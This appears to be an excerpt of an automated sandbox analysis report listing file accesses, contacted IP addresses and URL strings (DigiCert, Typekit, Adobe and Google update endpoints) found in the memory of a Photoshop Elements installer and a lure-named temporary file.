Source: Binary string: D:\Jenkins\workspace\ccd-hyperdrive\main\native\win32\build\msvs_win32_x86\Release\x86\sym\HDBootStrapper\HDBootStrapper\Set-up.pdb source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user~1\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile opened: C:\Users\user\AppData
Source: Joe Sandbox ViewIP Address: 18.239.50.31 18.239.50.31
Source: Joe Sandbox ViewIP Address: 63.140.62.27 63.140.62.27
Source: Joe Sandbox ViewIP Address: 63.140.62.222 63.140.62.222
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1290949826.000000000136F000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1290949826.000000000136F000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 0000000E.00000002.3754901379.000001BD9DCBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digic
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertA
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1290949826.000000000136F000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Google.Widevine.CDM.dll.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Google.Widevine.CDM.dll.17.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: svchost.exe, 0000000E.00000002.3757994329.000001BD9F2F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3753812155.000001BD9DC13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/
Source: svchost.exe, 0000000E.00000002.3757420032.000001BD9F265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/B
Source: svchost.exe, 0000000E.00000002.3757804750.000001BD9F2EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.3087516907.000001BD9F0FA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.3186071531.000001BD9F0FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3skwo2srs5xchyxzz6ujgnedha_9.52.0/gcmjk
Source: svchost.exe, 0000000E.00000003.3344719462.000001BD9F0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adaazxebpgqt5dgoqptvhnyrkajq_20241104.690
Source: svchost.exe, 0000000E.00000003.2102854188.000001BD9F0F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2080588463.000001BD9F0F2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620129906.000001BD9F0F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/
Source: svchost.exe, 0000000E.00000003.3087516907.000001BD9F0FA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3753812155.000001BD9DC13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620129906.000001BD9F0F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/nei
Source: svchost.exe, 0000000E.00000002.3757420032.000001BD9F265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/exe
Source: svchost.exe, 0000000E.00000002.3754142240.000001BD9DC5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/l
Source: svchost.exe, 0000000E.00000002.3757420032.000001BD9F265000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3757577504.000001BD9F2AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/
Source: svchost.exe, 0000000E.00000002.3758352246.000001BD9F330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/adaazxebpgqt5dgoqptvhnyrkajq_20241104.
Source: svchost.exe, 0000000E.00000003.2596741338.000001BD9F2FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8
Source: svchost.exe, 0000000E.00000002.3757577504.000001BD9F2AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
Source: svchost.exe, 0000000E.00000003.1328046176.000001BDA3400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://ocsp.digicert.com0
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1290949826.000000000136F000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://ocsp.digicert.com0A
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1290949826.000000000136F000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://ocsp.digicert.com0C
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000003.1340529682.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754120252.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://ocsp.digicert.com0X
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drString found in binary or memory: http://typekit.com/eulas/000000000000000000014822
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drString found in binary or memory: http://typekit.com/eulas/000000000000000000014823
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drString found in binary or memory: http://typekit.com/eulas/000000000000000000014824
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drString found in binary or memory: http://typekit.com/eulas/000000000000000000014825
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339572054.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763291568.0000000006250000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339416416.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drString found in binary or memory: http://typekit.com/eulas/000000000000000000014f4d
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339572054.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339416416.00000000053E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://typekit.com/eulas/000000000000000000014f4dQ;
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drString found in binary or memory: http://typekit.com/eulas/000000000000000000014f4e
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340892950.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340316690.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339827960.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340065858.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.00000000068F0000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drString found in binary or memory: http://typekit.com/eulas/000000000000000000014f4f
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339827960.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340065858.0000000005418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://typekit.com/eulas/000000000000000000014f4fdflt
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.0000000006CB0000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drString found in binary or memory: http://typekit.com/eulas/000000000000000000014f50
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340892950.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340316690.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.00000000068F0000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drString found in binary or memory: http://typekit.com/eulas/000000000000000000014f51
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1318073315.00000000053CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://typekit.com/eulas/000000000000000000014f51li
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drString found in binary or memory: http://typekit.com/eulas/000000000000000000014f52
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000003.1285708701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000002.1320220100.000000000018F000.00000004.00000010.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, Google.Widevine.CDM.dll.17.drString found in binary or memory: http://www.digicert.com/CPS0
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://cc-api-data-stage.adobe.io/ingest
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.0000000001377000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://cc-api-data.adobe.io/ingest
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.00000000068F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cc-api-data.adobe.io/ingest/?api_key=hdbs
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1529836245.000000000BA1F000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://delegated-or2.cloud.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://delegated-or2.cloud.adobe.ioO.https://delegated-or2.cloud.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://delegated-stage-or2.stage.cloud.adobe.
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3777002946.000000000D006000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://delegated-stage-or2.stage.cloud.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://delegated-stage-or2.stage.cloud.adobe.ioY
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3777002946.000000000D006000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://delegated-stage-va6.stage.cloud.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://delegated-stage-va6.stage.cloud.adobe.ioO.https://delegated-stage-va6.stage.cloud.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1529836245.000000000BA1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://delegated-va6.cloud.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://delegated-va6.cloud.adobe.ioO.https://delegated-va6.cloud.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://delegated-va6.cloud.adobe.iohttps://ims-na1.adobelogin.com/imsd
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763050320.0000000006167000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://delegated.adobelogin.com/(
